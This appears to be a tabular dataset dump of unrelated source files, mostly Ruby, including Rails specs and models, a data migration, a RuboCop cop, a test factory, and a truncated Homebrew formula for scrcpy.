hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
338a34387a487ff93f6b19042aca225401735c05 | 228 | class FakeFileIO < StringIO
attr_reader :original_filename
attr_reader :path
def initialize(filename, content)
super(content)
@original_filename = File.basename(filename)
@path = File.path(filename)
end
end
| 20.727273 | 48 | 0.741228 |
8762da7b26d2d268b481451a82080444424f8e69 | 874 | namespace :a1news do
desc "Collect News Sources"
task collect: :environment do
force = ENV["FORCE"]
as_of = ENV["HOURSAGO"].to_i.hours.ago || Time.now
NewsSource.subclasses.each do |newsource|
begin
# Only get new stuff after 5am
puts "--- #{newsource.source} ---"
if force || Cover.where(:date => 5.hours.ago.to_date, :source => newsource.source).empty?
puts "Processing #{newsource.source} either because force is on or not found in DB"
newsource.new(as_of).tap do |source|
if source.is_available?
puts "#{newsource.source} feed found"
source.collect
else
puts "#{newsource.source} feed not found"
end
end
end
rescue Exception => ex
# what should i do?!?
end
end
end
end
| 29.133333 | 97 | 0.567506 |
338858dbea5bbba513541b70bf561ab18ad88f71 | 8,440 | require 'test_helper'
class PatientTest < ActiveSupport::TestCase
before do
@user = create :user
@patient = create :patient, other_phone: '111-222-3333',
other_contact: 'Yolo'
@patient2 = create :patient, other_phone: '333-222-3333',
other_contact: 'Foobar'
@pregnancy = create :pregnancy, patient: @patient
end
describe 'callbacks' do
before do
@new_patient = build :patient, name: ' Name With Whitespace ',
other_contact: ' name with whitespace ',
other_contact_relationship: ' something ',
primary_phone: '111-222-3333',
other_phone: '999-888-7777'
end
it 'should clean fields before save' do
@new_patient.save
assert_equal 'Name With Whitespace', @new_patient.name
assert_equal 'name with whitespace', @new_patient.other_contact
assert_equal 'something', @new_patient.other_contact_relationship
assert_equal '1112223333', @new_patient.primary_phone
assert_equal '9998887777', @new_patient.other_phone
end
end
describe 'validations' do
it 'should build' do
assert @patient.valid?
end
it 'requires a name' do
@patient.name = nil
refute @patient.valid?
end
it 'requires a primary phone' do
@patient.primary_phone = nil
refute @patient.valid?
end
it 'requires a logged creating user' do
@patient.created_by_id = nil
refute @patient.valid?
end
%w(primary_phone other_phone).each do |phone|
it "should enforce a max length of 10 for #{phone}" do
@patient[phone] = '123-456-789022'
refute @patient.valid?
end
it "should clean before validation for #{phone}" do
@patient[phone] = '111-222-3333'
@patient.save
assert_equal '1112223333', @patient[phone]
end
end
%w(initial_call_date name primary_phone created_by).each do |field|
it "should enforce presence of #{field}" do
@patient[field.to_sym] = nil
refute @patient.valid?
end
end
it 'should require appointment_date to be after initial_call_date' do
@patient.initial_call_date = '2016-06-01'
@patient.appointment_date = '2016-05-01'
refute @patient.valid?
@patient.appointment_date = nil
assert @patient.valid?
@patient.appointment_date = '2016-07-01'
assert @patient.valid?
end
end
describe 'pledge_summary' do
it "should not error when there are no pregnancies" do
Patient.destroy_all
assert_equal '{:pledged=>0, :sent=>0}', Patient.pledged_status_summary.to_s
end
it "should return proper pledge summaries for various timespans" do
[@patient, @patient2].each do |pt|
create :pregnancy, patient: pt, created_by: @user
end
@patient.update appointment_date: ( Date.today + 4 )
@patient.pregnancy.update dcaf_soft_pledge: 300
@patient2.update appointment_date: ( Date.today + 8 )
@patient2.pregnancy.update dcaf_soft_pledge: 500, pledge_sent: true
assert_equal '{:pledged=>0, :sent=>0}', Patient.pledged_status_summary(1).to_s
assert_equal '{:pledged=>300, :sent=>0}', Patient.pledged_status_summary.to_s
assert_equal '{:pledged=>300, :sent=>500}', Patient.pledged_status_summary(10).to_s
end
end
describe 'callbacks' do
%w(name other_contact).each do |field|
it "should strip whitespace from before and after #{field}" do
@patient[field] = ' Yolo Goat '
@patient.save
assert_equal 'Yolo Goat', @patient[field]
end
end
%w(primary_phone other_phone).each do |field|
it "should remove nondigits on save from #{field}" do
@patient[field] = '111-222-3333'
@patient.save
assert_equal '1112223333', @patient[field]
end
end
end
# describe 'relationships' do
# it 'should have many pregnancies' do
# end
# it 'should have at least one associated patient' do
# end
# it 'should have only one active patient' do
# end
# end
describe 'search method' do
before do
@pt_1 = create :patient, name: 'Susan Sher', primary_phone: '124-456-6789'
@pt_2 = create :patient, name: 'Susan E',
primary_phone: '124-567-7890',
other_contact: 'Friend Ship'
@pt_3 = create :patient, name: 'Susan A', other_phone: '999-999-9999'
[@pt_1, @pt_2, @pt_3].each do |pt|
create :pregnancy, patient: pt, created_by: @user
end
end
it 'should find a patient on name or other name' do
assert_equal 1, Patient.search('Susan Sher').count
assert_equal 1, Patient.search('Friend Ship').count
end
# it 'should find multiple patients if there are multiple' do
# assert_equal 2, Patient.search('124-456-6789').count
# end
it 'should be able to find based on secondary phones too' do
assert_equal 1, Patient.search('999-999-9999').count
end
it 'should be able to find based on phone patterns' do
assert_equal 2, Patient.search('124').count
end
it 'should not choke if it does not find anything' do
assert_equal 0, Patient.search('no entries with this').count
end
end
describe 'other methods' do
before do
@patient = create :patient, primary_phone: '111-222-3333',
other_phone: '111-222-4444'
end
it 'primary_phone_display -- should be hyphenated phone' do
refute_equal @patient.primary_phone, @patient.primary_phone_display
assert_equal '111-222-3333', @patient.primary_phone_display
end
it 'secondary_phone_display - should be hyphenated other phone' do
refute_equal @patient.other_phone, @patient.other_phone_display
assert_equal '111-222-4444', @patient.other_phone_display
end
end
describe 'mongoid attachments' do
it 'should have timestamps from Mongoid::Timestamps' do
[:created_at, :updated_at].each do |field|
assert @patient.respond_to? field
assert @patient[field]
end
end
it 'should respond to history methods' do
assert @patient.respond_to? :history_tracks
assert @patient.history_tracks.count > 0
end
it 'should have accessible userstamp methods' do
assert @patient.respond_to? :created_by
assert @patient.created_by
end
end
describe 'methods' do
describe 'identifier method' do
it 'should return a identifier' do
@patient.update primary_phone: '111-333-5555'
assert_equal 'D3-5555', @patient.identifier
end
end
describe 'most_recent_note_display_text method' do
before do
@note = create :note, patient: @patient,
full_text: (1..100).map(&:to_s).join('')
end
it 'returns 44 characters of the notes text' do
assert_equal 44, @patient.most_recent_note_display_text.length
assert_match /^1234/, @patient.most_recent_note_display_text
end
end
describe 'history check methods' do
it 'should say whether a patient is still urgent' do
# TODO: TIMECOP
@patient.urgent_flag = true
@patient.save
assert @patient.still_urgent?
end
it 'should trim pregnancies after they have been urgent for five days' do
# TODO: TEST patient#trim_urgent_pregnancies
end
end
describe 'still urgent method' do
it 'should return true if marked urgent in last 6 days' do
@patient.update urgent_flag: true
assert @patient.still_urgent?
end
it 'should return false if pledge sent' do
@patient.update urgent_flag: true
@pregnancy.update pledge_sent: true
assert_not @patient.still_urgent?
end
it 'should return false if resolved without dcaf' do
@patient.update urgent_flag: true
@pregnancy.update resolved_without_dcaf: true
assert_not @patient.still_urgent?
end
it 'should return false if not updated for more than 6 days' do
Timecop.freeze(Time.zone.now - 7.days) do
@patient.update urgent_flag: true
end
assert_not @patient.still_urgent?
end
end
end
end
| 31.969697 | 89 | 0.639455 |
798b86be002e0ad81d9fc71aa03f8073287d62d3 | 147 | class Tag < ApplicationRecord
has_many :taggings, dependent: :delete_all
has_many :articles, through: :taggings
def to_s
name
end
end
| 16.333333 | 44 | 0.734694 |
4a7d8ab4c6cacee6d8385b14fab951d35fa7e889 | 6,067 | require "spec_helper"
describe MergeRequests::GetUrlsService do
let(:project) { create(:project, :public, :repository) }
let(:service) { described_class.new(project) }
let(:source_branch) { "my_branch" }
let(:new_merge_request_url) { "http://#{Gitlab.config.gitlab.host}/#{project.namespace.name}/#{project.path}/merge_requests/new?merge_request%5Bsource_branch%5D=#{source_branch}" }
let(:show_merge_request_url) { "http://#{Gitlab.config.gitlab.host}/#{project.namespace.name}/#{project.path}/merge_requests/#{merge_request.iid}" }
let(:new_branch_changes) { "#{Gitlab::Git::BLANK_SHA} 570e7b2abdd848b95f2f578043fc23bd6f6fd24d refs/heads/#{source_branch}" }
let(:deleted_branch_changes) { "d14d6c0abdd253381df51a723d58691b2ee1ab08 #{Gitlab::Git::BLANK_SHA} refs/heads/#{source_branch}" }
let(:existing_branch_changes) { "d14d6c0abdd253381df51a723d58691b2ee1ab08 570e7b2abdd848b95f2f578043fc23bd6f6fd24d refs/heads/#{source_branch}" }
let(:default_branch_changes) { "d14d6c0abdd253381df51a723d58691b2ee1ab08 570e7b2abdd848b95f2f578043fc23bd6f6fd24d refs/heads/master" }
describe "#execute" do
shared_examples 'new_merge_request_link' do
it 'returns url to create new merge request' do
result = service.execute(changes)
expect(result).to match([{
branch_name: source_branch,
url: new_merge_request_url,
new_merge_request: true
}])
end
end
shared_examples 'show_merge_request_url' do
it 'returns url to view merge request' do
result = service.execute(changes)
expect(result).to match([{
branch_name: source_branch,
url: show_merge_request_url,
new_merge_request: false
}])
end
end
shared_examples 'no_merge_request_url' do
it 'returns no URL' do
result = service.execute(changes)
expect(result).to be_empty
end
end
context 'pushing to default branch' do
let(:changes) { default_branch_changes }
it_behaves_like 'no_merge_request_url'
end
context 'pushing to project with MRs disabled' do
let(:changes) { new_branch_changes }
before do
project.project_feature.update_attribute(:merge_requests_access_level, ProjectFeature::DISABLED)
end
it_behaves_like 'no_merge_request_url'
end
context 'pushing one completely new branch' do
let(:changes) { new_branch_changes }
it_behaves_like 'new_merge_request_link'
end
context 'pushing to existing branch but no merge request' do
let(:changes) { existing_branch_changes }
it_behaves_like 'new_merge_request_link'
end
context 'pushing to deleted branch' do
let(:changes) { deleted_branch_changes }
it_behaves_like 'no_merge_request_url'
end
context 'pushing to existing branch and merge request opened' do
let!(:merge_request) { create(:merge_request, source_project: project, source_branch: source_branch) }
let(:changes) { existing_branch_changes }
it_behaves_like 'show_merge_request_url'
end
context 'pushing to existing branch and merge request is reopened' do
let!(:merge_request) { create(:merge_request, :reopened, source_project: project, source_branch: source_branch) }
let(:changes) { existing_branch_changes }
it_behaves_like 'show_merge_request_url'
end
context 'pushing to existing branch from forked project' do
let(:user) { create(:user) }
let!(:forked_project) { Projects::ForkService.new(project, user).execute }
let!(:merge_request) { create(:merge_request, source_project: forked_project, target_project: project, source_branch: source_branch) }
let(:changes) { existing_branch_changes }
# Source project is now the forked one
let(:service) { described_class.new(forked_project) }
before do
allow(forked_project).to receive(:empty_repo?).and_return(false)
end
it_behaves_like 'show_merge_request_url'
end
context 'pushing to existing branch and merge request is closed' do
let!(:merge_request) { create(:merge_request, :closed, source_project: project, source_branch: source_branch) }
let(:changes) { existing_branch_changes }
it_behaves_like 'new_merge_request_link'
end
context 'pushing to existing branch and merge request is merged' do
let!(:merge_request) { create(:merge_request, :merged, source_project: project, source_branch: source_branch) }
let(:changes) { existing_branch_changes }
it_behaves_like 'new_merge_request_link'
end
context 'pushing new branch and existing branch (with merge request created) at once' do
let!(:merge_request) { create(:merge_request, source_project: project, source_branch: "existing_branch") }
let(:new_branch_changes) { "#{Gitlab::Git::BLANK_SHA} 570e7b2abdd848b95f2f578043fc23bd6f6fd24d refs/heads/new_branch" }
let(:existing_branch_changes) { "d14d6c0abdd253381df51a723d58691b2ee1ab08 570e7b2abdd848b95f2f578043fc23bd6f6fd24d refs/heads/existing_branch" }
let(:changes) { "#{new_branch_changes}\n#{existing_branch_changes}" }
let(:new_merge_request_url) { "http://#{Gitlab.config.gitlab.host}/#{project.namespace.name}/#{project.path}/merge_requests/new?merge_request%5Bsource_branch%5D=new_branch" }
it 'returns 2 urls for both creating new and showing merge request' do
result = service.execute(changes)
expect(result).to match([{
branch_name: "new_branch",
url: new_merge_request_url,
new_merge_request: true
}, {
branch_name: "existing_branch",
url: show_merge_request_url,
new_merge_request: false
}])
end
end
context 'when printing_merge_request_link_enabled is false' do
it 'returns empty array' do
project.update!(printing_merge_request_link_enabled: false)
result = service.execute(existing_branch_changes)
expect(result).to eq([])
end
end
end
end
| 41.841379 | 182 | 0.714192 |
6152f9a4ce7e4de9960b5828fa6d2cf3b160f82c | 5,450 | class CcaCarrierProfilesMigration < Mongoid::Migration
def self.up
if Settings.site.key.to_s == "cca"
site_key = "cca"
Dir.mkdir("hbx_report") unless File.exists?("hbx_report")
file_name = "#{Rails.root}/hbx_report/carrier_profile_migration_status_#{TimeKeeper.datetime_of_record.strftime("%m_%d_%Y_%H_%M_%S")}.csv"
field_names = %w( organization_id benefit_sponsor_organization_id status)
logger = Logger.new("#{Rails.root}/log/carrier_profile_migration_data.log") unless Rails.env.test?
logger.info "Script Start for carrier_profile_#{TimeKeeper.datetime_of_record}" unless Rails.env.test?
CSV.open(file_name, 'w') do |csv|
csv << field_names
#build and create Organization and its profiles
status = create_profile(site_key, csv, logger)
if status
puts "Rake Task execution completed, check carrier_profile_migration_data logs & carrier_profile_migration_status csv for additional information." unless Rails.env.test?
else
puts "Script execution failed" unless Rails.env.test?
end
end
logger.info "End of the script for carrier_profile" unless Rails.env.test?
else
say "Skipping for non-CCA site"
end
end
def self.down
raise "Can not be reversed!"
end
private
def self.create_profile(site_key, csv, logger)
#find or build site
sites = self.find_site(site_key)
return false unless sites.present?
site = sites.first
#get main app organizations for migration
old_organizations = Organization.unscoped.exists("carrier_profile" => true)
#counters
total_organizations = old_organizations.count
existing_organization = 0
success =0
failed = 0
limit_count = 1000
say_with_time("Time taken to migrate organizations") do
old_organizations.batch_size(limit_count).no_timeout.all.each do |old_org|
begin
existing_new_organizations = find_new_organization(old_org)
if existing_new_organizations.count == 0
@old_profile = old_org.carrier_profile
json_data = @old_profile.to_json(:except => [:_id, :updated_by_id])
old_profile_params = JSON.parse(json_data)
@new_profile = self.initialize_new_profile(old_org, old_profile_params)
# @new_profile.issuer_hios_ids << @old_profile.issuer_hios_ids
new_organization = self.initialize_new_organization(old_org, site)
new_organization.save!
csv << [old_org.id, new_organization.id, "Migration Success"]
success = success + 1
else
existing_organization = existing_organization + 1
csv << [old_org.id, existing_new_organizations.first.id, "Already Migrated to new model, no action taken"]
end
rescue Exception => e
failed = failed + 1
csv << [old_org.id, "0", "Migration Failed"]
logger.error "Migration Failed for Organization HBX_ID: #{old_org.hbx_id} , #{e.inspect}" unless Rails.env.test?
end
end
end
logger.info " Total #{total_organizations} old organizations for type: carrier profile." unless Rails.env.test?
logger.info " #{failed} organizations failed to migrated to new DB at this point." unless Rails.env.test?
logger.info " #{success} organizations migrated to new DB at this point." unless Rails.env.test?
logger.info " #{existing_organization} old organizations are already present in new DB." unless Rails.env.test?
return true
end
def self.find_new_organization(old_org)
BenefitSponsors::Organizations::Organization.where(hbx_id: old_org.hbx_id)
end
def self.initialize_new_profile(old_org, old_profile_params)
new_profile = BenefitSponsors::Organizations::IssuerProfile.new(old_profile_params)
build_documents(old_org, new_profile)
build_office_locations(old_org, new_profile)
return new_profile
end
def self.build_documents(old_org, new_profile)
old_org.documents.each do |document|
doc = new_profile.documents.new(document.attributes.except("_id", "_type", "identifier"))
doc.identifier = document.identifier if document.identifier.present?
doc.save!
end
end
def self.build_office_locations(old_org, new_profile)
old_org.office_locations.each do |office_location|
new_office_location = new_profile.office_locations.new()
new_office_location.is_primary = office_location.is_primary
address_params = office_location.address.attributes.except("_id")
phone_params = office_location.phone.attributes.except("_id")
new_office_location.address = address_params
new_office_location.phone = phone_params
end
end
def self.initialize_new_organization(organization, site)
json_data = organization.to_json(:except => [:_id, :updated_by_id, :issuer_assigned_id, :versions, :version, :fein, :employer_profile, :broker_agency_profile, :general_agency_profile, :carrier_profile, :hbx_profile, :office_locations, :is_fake_fein, :home_page, :is_active, :updated_by, :documents])
old_org_params = JSON.parse(json_data)
exempt_organization = BenefitSponsors::Organizations::ExemptOrganization.new(old_org_params)
exempt_organization.site = site
exempt_organization.profiles << [@new_profile]
return exempt_organization
end
def self.find_site(site_key)
BenefitSponsors::Site.all.where(site_key: site_key.to_sym)
end
end
| 40.073529 | 303 | 0.723303 |
bbadacdbbdd0d07c2706b8ac0e3ecde0cff93d53 | 1,731 | require 'rails_helper'
describe MeasureComponent do
describe 'associations' do
describe 'duty expression' do
it_is_associated 'one to one to', :duty_expression do
let(:duty_expression_id) { Forgery(:basic).text(exactly: 3) }
end
end
describe 'measurement unit' do
it_is_associated 'one to one to', :measurement_unit do
let(:measurement_unit_code) { Forgery(:basic).text(exactly: 3) }
end
end
describe 'monetary unit' do
it_is_associated 'one to one to', :monetary_unit do
let(:monetary_unit_code) { Forgery(:basic).text(exactly: 3) }
end
end
describe 'measurement unit qualifier' do
it_is_associated 'one to one to', :measurement_unit_qualifier do
let(:measurement_unit_qualifier_code) { Forgery(:basic).text(exactly: 1) }
end
end
end
describe '#zero_duty?' do
context 'when the measure component has a zero duty amount' do
subject(:measure_component) { create(:measure_component, duty_amount: 0) }
it { is_expected.to be_zero_duty }
end
context 'when the measure component has a non-zero duty amount' do
subject(:measure_component) { create(:measure_component, duty_amount: 15) }
it { is_expected.not_to be_zero_duty }
end
end
describe '#ad_valorem?' do
context 'when the measure component is an ad valorum component' do
subject(:measure_component) { create(:measure_component, :ad_valorem) }
it { is_expected.to be_ad_valorem }
end
context 'when the measure component is not an ad valorum component' do
subject(:measure_component) { build(:measure_component) }
it { is_expected.not_to be_ad_valorem }
end
end
end
| 29.844828 | 82 | 0.688042 |
6a7810f20e7adbbe7a218555fdd304e21ea37469 | 1,725 | # encoding: utf-8
module RuboCop
module Cop
module Style
# This cop checks for unwanted parentheses in parameterless method calls.
class MethodCallParentheses < Cop
MSG = 'Do not use parentheses for method calls with no arguments.'
ASGN_NODES = [:lvasgn, :masgn] + Util::SHORTHAND_ASGN_NODES
def on_send(node)
_receiver, method_name, *args = *node
# methods starting with a capital letter should be skipped
return if method_name =~ /\A[A-Z]/
return unless args.empty? && node.loc.begin
return if same_name_assignment?(node)
add_offense(node, :begin)
end
def autocorrect(node)
lambda do |corrector|
corrector.remove(node.loc.begin)
corrector.remove(node.loc.end)
end
end
private
def same_name_assignment?(node)
_receiver, method_name, *_args = *node
node.each_ancestor(ASGN_NODES).any? do |asgn_node|
if asgn_node.masgn_type?
mlhs_node, _mrhs_node = *asgn_node
asgn_node = mlhs_node.children[node.sibling_index]
end
# `obj.method = value` parses as (send ... :method= ...), and will
# not be returned as an `asgn_node` here
# however, `obj.method ||= value` parses as (or-asgn (send ...) ...)
# which IS an `asgn_node`
if asgn_node.or_asgn_type? || asgn_node.and_asgn_type?
asgn_node, _value = *asgn_node
return false if asgn_node.send_type?
end
asgn_node.loc.name.source == method_name.to_s
end
end
end
end
end
end
| 30.803571 | 80 | 0.583768 |
ab6f9a61521f271b46b34261e0395cf9ae9aaf2a | 1,929 | # frozen_string_literal: true
FactoryBot.define do
factory :network_alert_payload, class: Hash do
initialize_with do
{
flow: {
time: '2021-02-02T18:04:21.213587449Z',
verdict: 'POLICY_DENIED',
dropReasonDesc: 123,
ethernet: { source: '56:b6:52:62:6b:68', destination: '3a:dc:e3:9a:55:11' },
IP: { source: '10.0.0.224', destination: '10.0.0.87', ipVersion: 'IPv4' },
l4: { TCP: { sourcePort: 38_794, destinationPort: 5000, flags: { SYN: nil } } },
source: {
ID: 799,
identity: 37_570,
namespace: 'gitlab-managed-apps',
labels: [
'k8s:app.kubernetes.io/component=controller',
'k8s:app=nginx-ingress'
],
podName: 'ingress-nginx-ingress-controller-7dd4d7474d-m95gd'
},
destination: {
ID: 259,
identity: 30_147,
namespace: 'agent-project-21-production',
labels: [
'k8s:app=production',
'k8s:io.cilium.k8s.namespace.labels.app.gitlab.com/app=root-agent-project'
],
podName: 'production-7b998ffb56-vvl68'
},
Type: 'L3_L4',
nodeName: 'minikube',
eventType: { type: 5 },
trafficDirection: 'INGRESS',
Summary: 'TCP Flags: SYN'
},
ciliumNetworkPolicy: {
kind: 'bla',
apiVersion: 'bla',
metadata: {
name: 'Cilium Alert',
generateName: 'generated NAme',
namespace: 'LocalGitlab',
selfLink: 'www.gitlab.com',
uid: '2d931510-d99f-494a-8c67-87feb05e1594',
resourceVersion: '23',
deletionGracePeriodSeconds: 42,
clusterName: 'TestCluster'
},
status: {}
}
}.with_indifferent_access
end
end
end
| 32.694915 | 90 | 0.518922 |
ede991e2aacf7afb54ffa381135eaf162892a2f8 | 2,346 | # frozen_string_literal: true
require 'dry/validation'
Dry::Validation.load_extensions(:monads)
# Configuration values and shared rules and macros for domain model validation contracts
module AcaEntities
module Ledger
module Qbo
# Application Contract
class ApplicationContract < Dry::Validation::Contract
config.messages.default_locale = :en
# config.messages.backend = :i18n
# config.messages.default_locale - default I18n-compatible locale identifier
# config.messages.backend - the localization backend to use. Supported values are: :yaml and :i18n
# config.messages.load_paths - an array of files paths that are used to load messages
# config.messages.top_namespace - the key in the locale files under which messages are defined, by default it's dry_validation
# config.messages.namespace - custom messages namespace for a contract class. Use this to differentiate common messages
# TODO: Uncomment Rules below and add nested validations
# @!macro ruleeach
# Validates a nested array of $0 params
# @!method rule(settings)
# rule(:tags).each do
# if key? && value
# result = CallCenter::Validation::TagContract.new.call(value)
# # Use dry-validation metadata error form to pass error hash along with text to calling service
# key.failure(text: "invalid tags", error: result.errors.to_h) if result && result.failure?
# end
# end
# rule(:phone_config) do
# if key? && value
# result = CallCenter::Validation::PhoneConfigContract.new.call(value)
# # Use dry-validation metadata error form to pass error hash along with text to calling service
# key.failure(text: "invalid phone_config", error: result.errors.to_h) if result && result.failure?
# end
# end
# rule(:identity_info) do
# if key? && value
# result = CallCenter::Validation::IdentityInfoContract.new.call(value)
# # Use dry-validation metadata error form to pass error hash along with text to calling service
# key.failure(text: "invalid identity_info", error: result.errors.to_h) if result && result.failure?
# end
# end
end
end
end
end
| 43.444444 | 134 | 0.662404 |
ac0cc7a9364950f20a12fe8b7d225593435b07a7 | 97 | # desc "Explaining what the task does"
# task :humanize_attributes do
# # Task goes here
# end
| 19.4 | 38 | 0.71134 |
acee7569011464b937d7229f189c8c52dc78c462 | 3,050 | # This file is copied to spec/ when you run 'rails generate rspec:install'
ENV['RAILS_ENV'] ||= 'test'
require File.expand_path('../../config/environment', __FILE__)
# Prevent database truncation if the environment is production
abort("The Rails environment is running in production mode!") if Rails.env.production?
require 'spec_helper'
require 'rspec/rails'
require 'capybara/rails'
# Add additional requires below this line. Rails is not loaded until this point!
# Requires supporting ruby files with custom matchers and macros, etc, in
# spec/support/ and its subdirectories. Files matching `spec/**/*_spec.rb` are
# run as spec files by default. This means that files in spec/support that end
# in _spec.rb will both be required and run as specs, causing the specs to be
# run twice. It is recommended that you do not name files matching this glob to
# end with _spec.rb. You can configure this pattern with the --pattern
# option on the command line or in ~/.rspec, .rspec or `.rspec-local`.
#
# The following line is provided for convenience purposes. It has the downside
# of increasing the boot-up time by auto-requiring all files in the support
# directory. Alternatively, in the individual `*_spec.rb` files, manually
# require only the support files necessary.
#
# Dir[Rails.root.join('spec/support/**/*.rb')].each { |f| require f }
# Checks for pending migration and applies them before tests are run.
# If you are not using ActiveRecord, you can remove this line.
ActiveRecord::Migration.maintain_test_schema!
RSpec.configure do |config|
# Remove this line if you're not using ActiveRecord or ActiveRecord fixtures
config.fixture_path = "#{::Rails.root}/spec/fixtures"
# If you're not using ActiveRecord, or you'd prefer not to run each of your
# examples within a transaction, remove the following line or assign false
# instead of true.
config.use_transactional_fixtures = false
config.before(:suite) do
DatabaseCleaner.strategy = :truncation
end
config.around(:each) do |example|
DatabaseCleaner.cleaning do
example.run
end
end
# RSpec Rails can automatically mix in different behaviours to your tests
# based on their file location, for example enabling you to call `get` and
# `post` in specs under `spec/controllers`.
#
# You can disable this behaviour by removing the line below, and instead
# explicitly tag your specs with their type, e.g.:
#
# RSpec.describe UsersController, :type => :controller do
# # ...
# end
#
# The different available types are documented in the features, such as in
# https://relishapp.com/rspec/rspec-rails/docs
config.infer_spec_type_from_file_location!
# Filter lines from Rails gems in backtraces.
config.filter_rails_from_backtrace!
# arbitrary gems may also be filtered via:
# config.filter_gems_from_backtrace("gem name")
config.include Warden::Test::Helpers
end
Shoulda::Matchers.configure do |config|
config.integrate do |with|
with.test_framework :rspec
with.library :rails
end
end
| 40.666667 | 86 | 0.746557 |
f8e0c7c19ed11ed074089b8b3da4806aba6000b5 | 449 | require_relative 'test_helper'
module ActiveMetric
class SubjectTest < ActiveSupport::TestCase
test "can retrieve report specific fields" do
class SubjectWithFields < Subject
field :foo
calculated_with Sample, 5
end
expected_fields = {foo: "bar"}.stringify_keys
subject = SubjectWithFields.create foo: "bar"
assert_equal expected_fields, subject.not_inherited_attributes
end
end
end
| 19.521739 | 68 | 0.710468 |
d522b3b882d0dd4c06af0edb3bf4613e640922d9 | 905 | module LanguageServer
module Protocol
module Interface
#
# Execute command registration options.
#
class ExecuteCommandRegistrationOptions
def initialize(work_done_progress: nil, commands:)
@attributes = {}
@attributes[:workDoneProgress] = work_done_progress if work_done_progress
@attributes[:commands] = commands
@attributes.freeze
end
# @return [boolean]
def work_done_progress
attributes.fetch(:workDoneProgress)
end
#
# The commands to be executed on the server
#
# @return [string[]]
def commands
attributes.fetch(:commands)
end
attr_reader :attributes
def to_hash
attributes
end
def to_json(*args)
to_hash.to_json(*args)
end
end
end
end
end
| 21.046512 | 83 | 0.577901 |
f7e0ce32c838b8d199e2958644ec415ef1f6b80c | 460 | require 'rails_helper'
# Specs in this file have access to a helper object that includes
# the GuessedLettersHelper. For example:
#
# describe GuessedLettersHelper do
# describe "string concat" do
# it "concats two strings with spaces" do
# expect(helper.concat_strings("this","that")).to eq("this that")
# end
# end
# end
RSpec.describe GuessedLettersHelper, :type => :helper do
pending "add some examples to (or delete) #{__FILE__}"
end
| 28.75 | 71 | 0.717391 |
79a04162174d2ed37809bdcee809b856dcedea28 | 2,190 | require 'spec_helper_min'
require 'carto/visualization_migrator'
describe Carto::VisualizationMigrator do
include Carto::Factories::Visualizations
include_context 'visualization creation helpers'
class VizMigrator
include Carto::VisualizationMigrator
end
let(:migrator) { VizMigrator.new }
shared_context 'full visualization' do
before(:all) do
@user_1 = FactoryGirl.create(:carto_user, private_tables_enabled: false)
@map, @table, @table_visualization, @visualization = create_full_visualization(Carto::User.find(@user_1.id), visualization_attributes: { version: 3 })
end
after(:all) do
destroy_full_visualization(@map, @table, @table_visualization, @visualization)
@user_1.destroy
end
end
describe '#migrate_visualization_to_v3' do
include_context 'full visualization'
it 'migrates layer selector for sequel model' do
@visualization.overlays << Carto::Overlay.new(type: 'layer_selector')
model = CartoDB::Visualization::Member.new(id: @visualization.id).fetch
migrator.migrate_visualization_to_v3(model)
model = CartoDB::Visualization::Member.new(id: @visualization.id).fetch
model.overlays.any? { |o| o.type == 'layer_selector' }.should be_false
model.map.options['layer_selector'].should be_true
end
it 'migrates layer selector for ActiveRecord model' do
@visualization.overlays << Carto::Overlay.new(type: 'layer_selector')
@visualization.reload
migrator.migrate_visualization_to_v3(@visualization)
@visualization.reload
@visualization.overlays.any? { |o| o.type == 'layer_selector' }.should be_false
@visualization.map.options['layer_selector'].should be_true
end
it 'fixes GMaps options' do
basemap = @visualization.layers.first
basemap.kind = 'gmapsbase'
basemap.options = { "type" => "GMapsBase", "base_type" => "roadmap" }
basemap.save!
migrator.migrate_visualization_to_v3(@visualization)
@visualization.reload
@visualization.layers.first.options.should have_key(:baseType)
@visualization.layers.first.options.should_not have_key(:base_type)
end
end
end
| 33.692308 | 156 | 0.723744 |
edbd93d2361ae544f8b2d377147b85a8b16866d3 | 2,132 | module Mutest
class Mutator
class Node
# Namespace for define mutations
class Define < self
private
# Emit mutations
#
# @return [undefined]
def dispatch
emit_arguments_mutations
emit_optarg_body_assignments
emit_restarg_body_mutation
emit_body(N_RAISE)
emit_body(N_ZSUPER)
emit_body(nil)
emit_body_mutations if body
end
# Emit mutations with optional arguments as assignments in method
#
# @return [undefined]
def emit_optarg_body_assignments
used_arguments.each do |argument|
next unless n_optarg?(argument)
emit_body_prepend(s(:lvasgn, *argument))
end
end
# Emit mutation with arg splat as empty array assignment in method
#
# @return [undefined]
def emit_restarg_body_mutation
used_arguments.each do |argument|
replacement =
if n_restarg?(argument)
s(:array)
elsif n_kwrestarg?(argument)
s(:hash)
end
next unless replacement && argument.children.one?
emit_body_prepend(s(:lvasgn, AST::Meta::Restarg.new(argument).name, replacement))
end
end
def used_arguments
arguments.children.select { |arg| AST::Meta::Optarg.new(arg).used? }
end
# Emit valid body ASTs depending on instance body
#
# @param node [Parser::AST::Node]
#
# @return [undefined]
def emit_body_prepend(node)
if body
emit_body(s(:begin, node, body))
else
emit_body(node)
end
end
# Mutator for instance method defines
class Instance < self
handle :def
children :name, :arguments, :body
end
# Mutator for singleton method defines
class Singleton < self
handle :defs
children :subject, :name, :arguments, :body
end
end
end
end
end
| 25.380952 | 93 | 0.554878 |
381b105d5f95df646e32de305159da6b1533798d | 292 | cask "geotagger" do
version "2.00"
sha256 "1c2dc9bceb21218d13961a0e9d77b91c2df38c596499f4eb805a428c285bedcc"
url "http://craig.stanton.net.nz/software/files/Geotagger#{version}.zip"
name "Geotagger"
homepage "http://craig.stanton.net.nz/code/geotagger/"
app "Geotagger.app"
end
| 26.545455 | 75 | 0.767123 |
61b5d614b3c05aebe5a3292c8ba682b28b67c164 | 2,514 | class Scrcpy < Formula
desc "Display and control your Android device"
homepage "https://github.com/Genymobile/scrcpy"
url "https://github.com/Genymobile/scrcpy/archive/v1.18.tar.gz"
sha256 "2995d74409e9a486e4f69d0f623299ebf615d9427d8e974dfd82355538a313e9"
license "Apache-2.0"
bottle do
sha256 arm64_big_sur: "0fd6c2d4d56cdbc09df21e7a8aabbeaa75a7658f99eb8478bdfd6b97d510dad6"
sha256 big_sur: "6c960c8555c710cd1058e256b34e6c93be8b3294a6b34bbc58ead2344d6da740"
sha256 catalina: "c6262834293a4667e870ec7977e90fe1b5dda59d646555f9c71435195ac4a970"
sha256 mojave: "1c5e721c141ecb90418ccf5500756c94bf48c2dc1ead190e6cc16024b5449430"
end
